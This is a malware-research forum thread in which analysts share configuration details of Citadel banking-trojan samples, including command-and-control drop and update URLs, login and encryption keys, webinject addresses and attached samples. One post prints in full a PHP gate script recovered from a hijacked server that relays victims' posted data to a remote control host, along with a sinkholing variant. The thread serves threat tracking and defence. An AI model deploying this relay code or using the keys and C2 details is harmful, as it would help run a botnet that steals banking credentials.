A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #21477  by Kafeine
 Thu Nov 28, 2013 12:37 pm
Xylitol wrote:Kafeine attached the wrong sample, simple as that :)
Yes Sorry. (got both in the same browsing run)
 #21553  by Xylitol
 Wed Dec 04, 2013 11:16 am
Citadel targeting America, Germany, Spanish, Italy, United Kingdom and some services like ebay, paypal, yandex, perfectmoney...
Code: Select all
Drop: hxtp://rag.su/main/vorota.php
Update: hxtp://rag.su/main/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 59 59 77 10 14 03 03 9B 51 CD 65 D2 A2 45 EE 37
https://zeustracker.abuse.ch/monitor.php?host=rag.su
https://www.virustotal.com/en/file/2808 ... 386155673/
webinject:
Code: Select all
https://secure-gateway2010.org/in675/x.php?cmdid=8&gettype=js&id=core2.js&uid=0000
Attachments
infected
(231.67 KiB) Downloaded 69 times
 #21578  by Xylitol
 Thu Dec 05, 2013 10:29 am
Citadel targeting Poland
Code: Select all
Drop: hxtp://109.235.51.68:54172/wus/2.php
Update:  hxtp://srv1.freedom-dns.ru:54172/wus/1.php
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: BD CA A6 B8 57 00 1F 63 54 44 AB 83 DF B9 A3 F7
https://zeustracker.abuse.ch/monitor.ph ... dom-dns.ru
https://www.virustotal.com/en/file/94dc ... 386239219/
webinject:
Code: Select all
https://iv-auth.org/a/www.php
Attachments
infected
(658.82 KiB) Downloaded 71 times
 #21581  by Xylitol
 Thu Dec 05, 2013 2:09 pm
lol:
Image
Targeting wellsfargo.
Code: Select all
Drop: hxtp://uaecarmarket.org/font/fade/gate.php
Update: hxtp://uaecarmarket.org/font/fade/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: F7 60 EA 00 6D 2E 97 7B 80 AA 57 94 87 C1 44 19
https://zeustracker.abuse.ch/monitor.ph ... market.org
Attachments
infected
(405.65 KiB) Downloaded 79 times
 #21633  by Xylitol
 Mon Dec 09, 2013 1:11 pm
lol 2:
Image
Targeting wellsfargo.
Code: Select all
Drop: hxtp://180.151.58.244:8080/Base/baseconf/gate.php
Update: hxtp://180.151.58.244:8080/Base/baseconf/ningga.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 63 E7 D8 90 84 29 A9 5C D2 54 2F 26 A9 9E 7E 78
enc key: EE801318260CN
https://zeustracker.abuse.ch/monitor.ph ... 151.58.244
https://www.virustotal.com/en/file/8149 ... 386594831/
Image
Attachments
infected
(553.45 KiB) Downloaded 64 times
 #21634  by FafZee
 Mon Dec 09, 2013 1:44 pm
@Xylitol for the second, it seems that there was another installation (perhaps for tests ?) and if the xampp configuration stay the same, we will find other sh!ts on this ip :/
 #21658  by Xylitol
 Thu Dec 12, 2013 2:43 pm
@FafZee, the previous xamp server seem down now.
Code: Select all
Drop: hxtp://82.146.56.132/gate.php
Update: hxtp://82.146.56.132/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: FC 1E 6A 7A 6C 1C B9 30 AE 82 37 FE D2 C8 50 12
https://zeustracker.abuse.ch/monitor.ph ... 146.56.132
https://www.virustotal.com/en/file/5089 ... 386859450/
No webinject, still it's stealing info.
Attachments
infected
(255.38 KiB) Downloaded 59 times
 #21688  by Xylitol
 Sun Dec 15, 2013 1:29 pm
No sample but redirect found on a hijacked server:
Code: Select all
<?php
$url = "http://62.75.220.183/superman/gate.php";
@error_reporting(0); @set_time_limit(0);
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80; 
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');
if(($data = @file_get_contents('php://input')) === false)$data = '';
$request  = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";
if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";
fwrite($real_server, $request."\r\n".$data);
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>
https://zeustracker.abuse.ch/monitor.ph ... mlikes.com
Code: Select all
http://62.75.220.183/superman/install/index.php <- 1.3.4.5
http://62.75.220.183/superman/_reports571334075/
Image
First seen on my tracker: 02/07/2013

Edit: i'm 'sinkholing' logs:
Code: Select all
<?php
$url = "http://62.75.220.183/superman/gate.php";
@error_reporting(0); @set_time_limit(0);
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');
if(($data = @file_get_contents('php://input')) === false)$data = '';
$request  = "POST {$url['path']}?ip=" . urlencode($_SERVER['REMOTE_ADDR']) . " HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";
if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";
//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: " . strlen($data) . "\r\n";
$request .= "Connection: Close\r\n";
$output   = $request . "\r\n" . $data;
fwrite($real_server, $output);
$result = '';
while (!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);
$input = substr($result, strpos($result, "\r\n\r\n") + 4);
file_put_contents('logs/' . uniqid() . '.log', $output . "\r\n\r\n\r\n" . $input);
echo($input);
?>
Edit 2:
Okay, Citadel version 1.3.4.5
Targeting Italy and some services like blogger, mail.google, zynga.com, netflix.com...
Code: Select all
Drop: hxtp://adamlikes.com/wp-content/uploads/1n388.php
Update: hxtp://185.25.116.194/20mf9sl.php|file=al888al.exe
Login key: F197EC5F0400E32FA9DD6AD090CFC61F
Key: DF 06 D7 B9 E6 17 C2 F2 7F E7 CE 1C 20 84 5D 75
John Doe 79
https://www.virustotal.com/en/file/95e5 ... 387117759/

Image
Attachments
no passwd
(922.85 KiB) Downloaded 53 times
infected
(192.07 KiB) Downloaded 58 times
 #21692  by Xylitol
 Sun Dec 15, 2013 6:40 pm
Citadel targeting Canada
Code: Select all
Drop: hxtp://wmzbase.ru/01net/gate.php
Update: hxtp://wmzbase.ru/01net/file.php|file=soft.exe
Login key: C1F20D2340B519056A7D89B7DF4B0FFF
Key: 33 F1 D7 31 61 F5 80 D2 6B B8 70 27 AB 01 85 33
Image

Same actor as: http://www.kernelmode.info/forum/viewto ... 110#p21457 and same webinject.
https://zeustracker.abuse.ch/monitor.ph ... wmzbase.ru
https://www.virustotal.com/en/file/eb02 ... 387034327/
Attachments
infected
(254.61 KiB) Downloaded 62 times
  • 1
  • 11
  • 12
  • 13
  • 14
  • 15
  • 20